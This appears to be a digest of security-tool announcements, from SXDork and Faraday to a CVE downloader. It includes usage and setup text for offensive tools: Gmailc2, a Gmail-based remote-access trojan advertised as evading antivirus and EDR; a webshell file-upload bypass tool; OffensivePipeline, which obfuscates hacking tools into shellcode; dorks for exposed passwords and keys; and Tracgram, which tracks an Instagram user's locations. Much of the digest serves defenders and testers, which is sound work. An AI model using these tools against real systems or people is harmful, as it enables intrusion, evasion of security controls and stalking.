SXDork is a powerful tool that utilizes the technique of google dorking to search for specific information on the internet. Google dorking is a method of using advanced search operators and keywords to uncover sensitive information that is publicly available on the internet. SXDork offers a wide range of options to search for different types of dorks, such as domain login dork, wpadmin dork, SQL dork, configuration file dorks, logfile dorks, dashboard dork, id_rsa dorks, ftp dorks, backup file dorks, mail archive dorks, password dorks, DCIM photos dork, and CCTV dorks.

One of the key features of SXDork is its ability to search dorks using the -s flag. This function allows users to retrieve a significant amount of information related to search keywords. Users can specify specific keywords and the tool will search for all the related information available on the internet. Additionally, users can use the -r flag to set the number of results that will be displayed. The default setting is 10 results, however, users can increase or decrease the number of results as per their requirement. This feature is useful for users who are looking for specific information and want to filter through the results quickly.

SXDork also allows users to search wildcard domains and find a wide range of information. This feature is particularly useful for security researchers, penetration testers and other professionals who need to find sensitive information on the internet. With the ability to search for different types of dorks, wildcard domains and filter through results, SXDork is a powerful tool that can help users find information that is publicly available on the internet.

SXDork has the ability to search for information on multiple domains. By default, the tool searches for information on pastebin.com and controlc.com, but you can easily add more domains to search against. To do this, you can navigate to the src directory and edit the dorks.py file, where you will see an array called src that contains the default domains. Simply add more domains to this array, and the next time you run a search query, SXDork will check all the domains in the array for the keyword you are searching for. This allows you to easily find information across multiple domains.

Installation

git clone https://github.com/samhaxr/SXDork.git
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python SXDork.py

Usage

usage: SXDork.py [-h] [-s SEARCH] [-r RESULT] [-dl DOMLOGIN] [-da DOMADMIN]
[-wp WPADMIN] [-lp LPANEL] [-sql SQLFILE] [-cnf CONFILE]
[-log LOGFILE] [-dash DASHBOARD] [-rsa IDRSA] [-ftp FTPFILE]
[-bck BACKUPFILE] [-ma MAILARCHIVE] [-pw PASSWORD]
[-pic PHOTOS] [-cam CCTVCAM]

Search keywords using google dork

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Search keyword with dork
-r RESULT, --result RESULT
Number of output result
-dl DOMLOGIN, --domlogin DOMLOGIN
Search domain(s) for login pages
-da DOMADMIN, --domadmin DOMADMIN
Search domain(s) for admin panels
-wp WPADMIN, --wpadmin WPADMIN
Search domain(s) for wordpress admin
-lp LPANEL, --lpanel LPANEL
Search domain(s) for login panels
-sql SQLFILE, --sqlfile SQLFILE
Search domain(s) for sql database files
-cnf CONFILE, --confile CONFILE
Search domain(s) for configuration files
-log LOGFILE, --logfile LOGFILE
Search domain(s) for log files
-dash DASHBOARD, --dashboard DASHBOARD
Search domain(s) for the dashboard
-rsa IDRSA, --idrsa IDRSA
Search domain(s) for id_rsa pub keys
-ftp FTPFILE, --ftpfile FTPFILE
Search domain(s) for FTP files
-bck BACKUPFILE, --backupfile BACKUPFILE
Search domain(s) for backup files
-ma MAILARCHIVE, --mailarchive MAILARCHIVE
Search domain(s) for ma il archives
-pw PASSWORD, --password PASSWORD
Search domain(s) for passwords
-pic PHOTOS, --photos PHOTOS
Search domain(s) for DCIM/Photos
-cam CCTVCAM, --cctvcam CCTVCAM
Search domain(s) for CCTV/CAMs


CVE-Vulnerability-Information-Downloader - Downloads Information From NIST (CVSS), First.Org (EPSS), And CISA (Exploited Vulnerabilities) And Combines Them Into One List


Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities.
Exploit Prediction Scoring System (EPSS) estimates the likelihood that a software vulnerability will be exploited in the wild.
CISA publishes a list of known exploited vulnerabilities.

This projects downloads the information from the three sources and combines them into one list.
Scanners show you the CVE number and the CVSS score, but do often not export the full details like "exploitabilityScore" or "userInteractionRequired". By adding the EPSS score you get more options to select what to do first and filter on the thresholds which makes sense for your environment.
You can use the information to enrich the information provided from your vulnerability scanner like OpenVAS to prioritize remediation.
You can use tools like PowerBI to combine the results from the vulnerability scanner with the information downloaded by the script in the repository.

After the download the required information will be extracted, formatted, and output files will be generated.
CVSS, EPSS and a combined file of all CVE information will be available. Outputs are available in json and csv formats.
Additionally the information is imported into a sqlite database.

The goal was not performance or efficiency.
Instead the script is written in a simple way. Multiple steps are made to make easier to understand and traceable. Files from intermediate steps are written to disk to allow you make it easier for you to adjust the commands to your needs.
It is only using bash, jq, and sqlite3 to be very beginner friendly and demonstrate the usage of jq.


PowerBI Example Dashboard

This repository contains a demo folder with a PowerBI template file. It generate a dashboard which you can adjust to your needs.

The OpenVAS report must be in the csv format for the import to work.

PowerBI will use the created CVE.json file and create a relationship:

You can download PowerBI for free from https://aka.ms/pbiSingleInstaller and you don't need an Microsoft account to use it.

Configuration

  1. Get an NIST API key: https://nvd.nist.gov/developers/request-an-api-key
  2. cp env_example .env
  3. edit the .env file and add your API key
  4. optional: edit docker-compose file and adjust the cron schedule
  5. optional: edit data/vulnerability-tables-logstash/config/logstash.conf
  6. docker-compose up -d
  7. you will find the files in data/vulnerability-tables-cron/output/ after the script completed. It needs several minutes.

Run

You can either wait for cron to execute the download script on a schedule.
Alternatively you can execute the download script manually by running:

docker exec -it vulnerability-tables-cron bash /opt/scripts/download.sh

Container Description

There are three docker containers.
The cron container downloads the information once a week (Monday 06:00) and stores the files in the output directory.
It uses curl and wget to download files. jq is used work with json.

The filebeat container reads the json files and forwards it to the logstash container.
The logstash container can be used to send to a OpenSearch instance, upload it to Azure Log Analytics, or other supported outputs.
Filebeat and logstash are optional and are only included for continence.

Example output files

Several output files will be generated. Here is an estimate:

316K   CISA_known_exploited.csv
452K CISA_known_exploited.json
50M CVSS.csv
179M CVSS.json
206M CVE.json
56M CVE.csv
6.7M EPSS.csv
12M EPSS.json
49M database.sqlite

You can expect this information for every CVE:

grep -i 'CVE-2021-44228' CVE.json | jq
{
"CVE": "CVE-2021-44228",
"CVSS2_accessComplexity": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"CVSS2_accessVector": "NETWORK",
"CVSS2_authentication": "MEDIUM",
"CVSS2_availabilityImpact": "NONE",
"CVSS2_baseScore": "COMPLETE",
"CVSS2_baseSeverity": "COMPLETE",
"CVSS2_confidentialityImpact": "COMPLETE",
"CVSS2_exploitabilityScore": "9.3",
"CVSS2_impactScore": "null",
"CVSS2_integrityImpact": "8.6",
"CVSS2_vectorString": "10",
"CVSS3_attackComplexity": "null",
"CVSS3_attackVector": "null",
"CVSS3_availabilityImpact": "null",
"CVSS3_baseScore": "null",
"CVSS3_baseSeverity": "null",
"CVSS3_confidentialityImpact": "null",
"CVSS3_exploitabilityScore": "null",
"CVSS3_impactScore": "null",
"CVSS3_integrityImpact": "null",
"CVSS3_privilegesRequired": "null",
"CVSS3_scope": "null",
"CVSS3_userInteraction ": "null",
"CVSS3_vectorString": "null",
"CVSS3_acInsufInfo": "null",
"CVSS3_obtainAllPrivilege": "null",
"CVSS3_obtainUserPrivilege": "null",
"CVSS3_obtainOtherPrivilege": "null",
"CVSS3_userInteractionRequired": "null",
"EPSS": "0.97095",
"EPSS_Percentile": "0.99998",
"CISA_dateAdded": "2021-12-10",
"CISA_RequiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available."
}

Links



Tracgram - Use Instagram Location Features To Track An Account


Trackgram Use Instagram location features to track an account

Usage

At this moment the usage of Trackgram is extremly simple:

1. Download this repository

2. Go through the instalation steps

3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your instagram password
- OBJECTIVE: your objective username

+ Optional:
- path_to_csv: the path were the csv file will be stored, including the name


4. Execute it with python3 tracgram.py

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! by now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when relate post was made
    • Link to Google Maps address
  3. Graph relating the posts count for an specific location

  4. Generate a easy to process .CSV file



Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


Note:

 This RAT communicates Via Gmail SMTP (or u can use any other smtps as well) but Gmail SMTP is valid
because most of the companies block unknown traffic so gmail traffic is valid and allowed everywhere.

Warning:

 1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!

How To Setup

 1. Create Two seperate Gmail Accounts.
2. Now enable SMTP On Both Accounts (check youtube if u don't know)
3. Suppose you have already created Two Seperate Gmail Accounts With SMTP enabled
A -> first account represents Your_1st_gmail@gmail.com
B -> 2nd account represents your_2nd_gmail@gmail.com
4. Now Go To server.py file and fill the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Now Go To client.py file and fill the following at line 16:
imapserver = "imap.gmail.com" (dont change this)
username = "your_2nd_gmail@gmail.com"
password = "your2ndgmailapp password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don 't change this)
6. Enjoy

How To Run:-

 *:- For Windows:-
1. Make Sure python3 and pip is installed and requriements also installed
2. python server.py (on server side)


*:- For Linux:-
1. Make Sure All Requriements is installed.
2. python3 server.py (on server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD Ratio 0/40
2) Bypass Any EDR's Solutions
3) Bypass Any Network Restrictions
4) Commands Are Being Sent in Base64 And Decoded on server side
5) No More Tcp Shits

Warning:-

Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bugbounty programs, that were collected by chaos.projectdiscovery.io, bounty-targets-data or that just had responsible disclosure programs with a total number of 4095 domains! If subdomains appear more than in 5-10 different scopes, they will be put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less< /strong>.

You can find complete list of sources here

Lists

Subdomains

In these lists you will find most popular subdomains as is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. F.E - dev.stg subdomain will be split into two words dev and stg. dev will have level = 2, stg - level = 1. You can use these wordlists for combinatory attacks for subdomain searches. There are several types of level.txt wordlists that follow the idea of subdomains.

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular splitted subdomains

In these lists, you will find the most popular splitted words from subdomains on all levels. For example - dev.stg subdomain will be splitted in two words dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Reverseip_Py - Domain Parser For IPAddress.com Reverse IP Lookup


Domain parser for IPAddress.com Reverse IP Lookup. Writen in Python 3.

What is Reverse IP?

Reverse IP refers to the process of looking up all the domain names that are hosted on a particular IP address. This can be useful for a variety of reasons, such as identifying all the websites that are hosted on a shared hosting server or finding out which websites are hosted on the same IP address as a particular website.


Requirements

  • beautifulsoup4
  • requests
  • urllib3

Tested on Debian with Python 3.10.8

Install Requirements

pip3 install -r requirements.txt

How to Use

Help Menu

python3 reverseip.py -h
usage: reverseip.py [-h] [-t target.com]

options:
-h, --help show this help message and exit
-t target.com, --target target.com
Target domain or IP

Reverse IP

python3 reverseip.py -t google.com

Disclaimer

Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question.

Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by author of this tool (yuyudhn).



Faraday - Open Source Vulnerability Management Platform


Security has two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve remediation efforts. With Faraday, you may focus on discovering vulnerabilities while we help you with the rest. Just use it in your terminal and get your work organized on the run. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday aggregates and normalizes the data you load, allowing exploring it into different visualizations that are useful to managers and analysts alike.

To read about the latest features check out the release notes!


Install

Docker-compose

The easiest way to get faraday up and running is using our docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml
$ docker-compose up

If you want to customize, you can find an example config over here Link

Docker

You need to have a Postgres running first.

 $ docker run \
-v $HOME/.faraday:/home/faraday/.faraday \
-p 5985:5985 \
-e PGSQL_USER='postgres_user' \
-e PGSQL_HOST='postgres_ip' \
-e PGSQL_PASSWD='postgres_password' \
-e PGSQL_DBNAME='postgres_db_name' \
faradaysec/faraday:latest

PyPi

$ pip3 install faradaysec
$ faraday-manage initdb
$ faraday-server

Binary Packages (Debian/RPM)

You can find the installers on our releases page

$ sudo apt install faraday-server_amd64.deb
# Add your user to the faraday group
$ faraday-manage initdb
$ sudo systemctl start faraday-server

Add your user to the faraday group and then run

Source

If you want to run directly from this repo, this is the recommended way:

$ pip3 install virtualenv
$ virtualenv faraday_venv
$ source faraday_venv/bin/activate
$ git clone git@github.com:infobyte/faraday.git
$ pip3 install .
$ faraday-manage initdb
$ faraday-server

Check out our documentation for detailed information on how to install Faraday in all of our supported platforms

For more information about the installation, check out our Installation Wiki.

In your browser now you can go to http://localhost:5985 and login with "faraday" as username, and the password given by the installation process

Getting Started

Learn about Faraday holistic approach and rethink vulnerability management.

Integrating faraday in your CI/CD

Setup Bandit and OWASP ZAP in your pipeline

Setup Bandit, OWASP ZAP and SonarQube in your pipeline

Faraday Cli

Faraday-cli is our command line client, providing easy access to the console tools, work in faraday directly from the terminal!

This is a great way to automate scans, integrate it to CI/CD pipeline or just get metrics from a workspace

$ pip3 install faraday-cli

Check our faraday-cli repo

Check out the documentation here.


Faraday Agents

Faraday Agents Dispatcher is a tool that gives Faraday the ability to run scanners or tools remotely from the platform and get the results.

Plugins

Connect you favorite tools through our plugins. Right now there are more than 80+ supported tools, among which you will find:


Missing your favorite one? Create a Pull Request!

There are two Plugin types:

Console plugins which interpret the output of the tools you execute.

$ faraday-cli tool run \"nmap www.exampledomain.com\"
💻 Processing Nmap command
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-22 14:13 -03
Nmap scan report for www.exampledomain.com (10.196.205.130)
Host is up (0.17s latency).
rDNS record for 10.196.205.130: 10.196.205.130.bc.example.com
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
2222/tcp open EtherNetIP-1
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
⬆ Sending data to workspace: test
✔ Done

Report plugins which allows you to import previously generated artifacts like XMLs, JSONs.

faraday-cli tool report burp.xml

Creating custom plugins is super easy, Read more about Plugins.

API

You can access directly to our API, check out the documentation here.

Links



ThreatHound - Tool That Help You On Your IR & Threat Hunting And CA


This tool will help you on your IR & Threat Hunting & CA. just drop your event log file and anlayze the results.


New Release Features:

  • support windows (ThreatHound.exe)
  • C for Linux based
  • new vesion available in C also
  • now you can save results in json file or print on screen it as you want by arg 'print' "'yes' to print the results on screen and 'no' to save the results on json file"
  • you can give windows event logs folder or single evtx file or multiple evtx separated by comma by arg -p
  • you can now give sigam ruels path by arg -s
  • add multithreading to improve runing speed
  • ThreatHound.exe is agent based you can push it and run it on multiple servers
  • Example:
$ ThreatHound.exe -s ..\sigma_rules\ -p C:\Windows\System32\winevt\Logs\ -print no
  • NOTE: give cmd full promission to read from "C:\Windows\System32\winevt\Logs"

  • Linux Based:

  • Windows Based

I’ve built the following:

  • A dedicated backend to support Sigma rules for python
  • A dedicated backend for parsing evtx for python
  • A dedicated backend to match between evtx and the Sigma rules

Features of the tool:

  • Automation for Threat hunting, Compromise Assessment, and Incident Response for the Windows Event Logs
  • Downloading and updating the Sigma rules daily from the source
  • More then 50 detection rules included
  • support for more then 1500 detection rules for Sigma
  • Support for new sigma rules dynamically and adding it to the detection rules
  • Saving of all the outputs in JSON format
  • Easily add any detection rules you prefer
  • you can add new event log source type in mapping.py easily

To-do:

  • Support for Sigma rules dedicated for DNS query
  • Modifying the speed of algorithm dedicated for the detection and making it faster
  • Adding JSON output that supports Splunk
  • More features

installiton:

$ git clone https://github.com/MazX0p/ThreatHound.git
$ cd ThreatHound
$ pip install - r requirements.txt
$ pyhton3 ThreatHound.py
  • Note: glob doesn't support get path of the directory if it has spaces on folder names, please ensure the path of the tool is without spaces (folders names)

Demo:

https://player.vimeo.com/video/784137549?h=6a0e7ea68a&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479

Screenshots:



Upload_Bypass_Carnage - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!


File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!

POC video:

File upload restrictions bypass by using different bug bounty techniques! Tool must be running with all its assets!


Installation:

pip3 install -r requirements.txt

Usage: upload_bypass.py [options]

Options: -h, --help

  show this help message and exit

-u URL, --url=URL

  Supply the login page, for example: -u http://192.168.98.200/login.php'

-s , --success

 Success message when upload an image, example: -s 'Image uploaded successfully.'

-e , --extension

 Provide server backend extension, for example: --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a , --allowed

 Provide allowed extensions to be uploaded, for example: php,asp,jsp,perl

-H , --header

 (Optional) - for example: '"X-Forwarded-For":"10.10.10.10"' - Use double quotes around the data and wrapp it all with single quotes. Use comma to separate multi headers.

-l , --location

 (Optional) - Supply a remote path where the webshell suppose to be. For exmaple: /uploads/

-S, --ssl

 (Optional) - No checks for TLS or SSL

-p, --proxy

 (Optional) - Channel the requests through proxy

-c, --continue

 (Optional) - If set, the brute force will continue even if one or more methods found!

-v, --verbose

 (Optional) - Printing the http response in terminal

-U , --username

 (Optional) - Username for authentication. For exmaple: --username admin

-P , --password

 (Optional) - - Password for authentication. For exmaple: --password 12345


OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises


OfensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises.
A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.


Features

  • Currently only supports C# (.Net Framework) projects
  • Allows to clone public and private (you will need credentials :D) git repositories
  • Allows to work with local folders
  • Randomizes project GUIDs
  • Randomizes application information contained in AssemblyInfo
  • Builds C# projects
  • Obfuscates generated binaries
  • Generates shellcodes from binaries
  • There are 79 tools parameterised in YML templates (not all of them may work :D)
  • New tools can be added using YML templates
  • It should be easy to add new plugins...

What's new in version 2.0

  • Almost complete code rewrite (new bugs?)
  • Cloning from private repositories possible (authentication via GitHub authToken)
  • Possibility to copy a local folder instead of cloning from a remote repository
  • New module to generate shellcodes with Donut
  • New module to randomize GUIDs of applications
  • New module to randomize the AssemblyInfo of each application
  • 60 new tools added

Examples

  • List all tools:
OffensivePipeline.exe list
  • Build all tools:
OffensivePipeline.exe all
  • Build a tool
OffensivePipeline.exe t toolName
  • Clean cloned and build tools
OffensivePipeline.exe 

Output example

PS C:\OffensivePipeline> .\OffensivePipeline.exe t rubeus

ooo
.osooooM M
___ __ __ _ ____ _ _ _ +y. M M
/ _ \ / _|/ _| ___ _ __ ___(_)_ _____| _ \(_)_ __ ___| (_)_ __ ___ :h .yoooMoM
| | | | |_| |_ / _ \ '_ \/ __| \ \ / / _ \ |_) | | '_ \ / _ \ | | '_ \ / _ \ oo oo
| |_| | _| _| __/ | | \__ \ |\ V / __/ __/| | |_) | __/ | | | | | __/ oo oo
\___/|_| |_| \___|_| |_|___/_| \_/ \___|_| |_| .__/ \___|_|_|_| |_|\___| oo oo
|_| MoMoooy. h:
M M .y+
M Mooooso.
ooo

@aetsu
v2.0.0


[+] Loading tool: Rubeus
Clonnig repository: Rubeus into C:\OffensivePipeline\Git\Rubeus
Repository Rubeus cloned into C:\OffensivePipeline\Git\Rubeus

[+] Load RandomGuid module
Searching GUIDs...
> C:\OffensivePipeline\Git\Rubeus\Rubeus.sln
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
Replacing GUIDs...
File C:\OffensivePipeline\Git\Rubeus\Rubeus.sln:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!


[+] Load RandomAssemblyInfo module
Replacing strings in C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
[assembly: AssemblyTitle("Rubeus")] -> [assembly: AssemblyTitle("g4ef3fvphre")]
[assembly: AssemblyDescription("")] -> [assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")] -> [assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")] -> [assembly: AssemblyCompany("")]
[assembly: AssemblyProduc t("Rubeus")] -> [assembly: AssemblyProduct("g4ef3fvphre")]
[assembly: AssemblyCopyright("Copyright © 2018")] -> [assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")] -> [assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")] -> [assembly: AssemblyCulture("")]


[+] Load BuildCsharp module
[+] Checking requirements...
[*] Downloading nuget.exe from https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
[+] Download OK - nuget.exe
[+] Path found - C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat
Solving dependences with nuget...
Building solution...
[+] No errors!
[+] Output folder: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


[+] Load ConfuserEx module
[+] Checking requirements...
[+] Downloading ConfuserEx from https://github.com/mkaring/ConfuserEx/releases/download/v1.6.0/ConfuserEx-CLI.zip
[+] Download OK - ConfuserEx
Confusing...
[+] No errors!


[+] Load Donut module
Generating shellcode...

Payload options:
Domain: RMM6XFC3
Runtime:v4.0.30319

Raw Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin
B64 Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin.b64

[+] No errors!


[+] Generating Sha256 hashes
Output file: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


-----------------------------------------------------------------
SUMMARY

- Rubeus
- RandomGuid: OK
- RandomAssemblyInfo: OK
- BuildCsharp: OK
- ConfuserEx: OK
- Donut: OK

-----------------------------------------------------------------

Plugins

  • RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
  • RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
  • BuildCsharp: build c# project
  • ConfuserEx: obfuscate c# tools
  • Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.

Add a tool from a remote git

The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:

  • Rubeus.yml file:
tool:
- name: Rubeus
description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
gitLink: https://github.com/GhostPack/Rubeus
solutionPath: Rubeus\Rubeus.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool build process
  • AuthUser: user name from github (not used for public repositories)
  • AuthToken: auth token from github (not used for public repositories)

Add a tool from a private git

tool:
- name: SharpHound3-Custom
description: C# Rewrite of the BloodHound Ingestor
gitLink: https://github.com/aaaaaaa/SharpHound3-Custom
solutionPath: SharpHound3-Custom\SharpHound3.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser: aaaaaaa
authToken: abcdefghijklmnopqrsthtnf

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from GitHub
  • AuthToken: auth token from GitHub (documented at GitHub: creating a personal access token)

Add a tool from local git folder

tool:
- name: SeatbeltLocal
description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
solutionPath: SeatbeltLocal\Seatbelt.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: path where the tool is located
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from github (not used for local repositories)
  • AuthToken: auth token from github (not used for local repositories)

Requirements for the release version (Visual Studio 2019/2022 is not required)

In the OffensivePipeline.dll.config file it's possible to change the version of the build tools used.

  • Build Tools 2019:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\Common7\Tools\VsDevCmd.bat"/>
  • Build Tools 2022:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"/>

Requirements for build

Credits

Supported tools



Misp-Extractor - Tool That Connects To A MISP Instance And Retrieves Attributes Of Specific Types (Such As IP Addresses, URLs, And Hashes)


This code connects to a given MISP (Malware Information Sharing Platform) server and parses a given number of events, writing the IP addresses, URLs, and MD5 hashes found in the events to three separate files.


Usage

To use this script, you will need to provide the URL of your MISP instance and a valid API key. You can then call the MISPConnector.run() method to retrieve the attributes and save them to files.

To use the code, run the following command:

python3 misp_connector.py --misp-url <MISP_URL> --misp-key <MISP_API_KEY> --limit <EVENT_LIMIT>

Supported attribute types

The MISPConnector class currently supports the following attribute types:

  • ip-src
  • ip-dst
  • md5
  • url
  • domain

If an attribute of one of these types is found in an event, it will be added to the appropriate set (for example, IP addresses will be added to the network_set) and written to the corresponding file (network.txt, hash.txt, or url.txt).

Configuration

The code can be configured by passing arguments to the command-line script. The available arguments are:

  • misp-url: The URL of the MISP server. This argument is required.
  • misp-key: The API key for the MISP server. This argument is required.
  • limit: The maximum number of events to parse. The default is 2000.

Limitations

This script has the following limitations:

  • It only retrieves attributes of specific types (as listed above).
  • It only writes the retrieved attributes to files, without any further processing or analysis.
  • It only retrieves a maximum of 2000 events, as specified by the limit parameter in the misp.search() method.

License

This code is provided under the MIT License. See the LICENSE file for more details.



Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs


Web Hacking Playground is a controlled web hacking environment. It consists of vulnerabilities found in real cases, both in pentests and in Bug Bounty programs. The objective is that users can practice with them, and learn to detect and exploit them.

Other topics of interest will also be addressed, such as: bypassing filters by creating custom payloads, executing chained attacks exploiting various vulnerabilities, developing proof-of-concept scripts, among others.


Important

The application source code is visible. However, the lab's approach is a black box one. Therefore, the code should not be reviewed to resolve the challenges.

Additionally, it should be noted that fuzzing (both parameters and directories) and brute force attacks do not provide any advantage in this lab.

Setup

It is recommended to use Kali Linux to perform this lab. In case of using a virtual machine, it is advisable to use the VMware Workstation Player hypervisor.

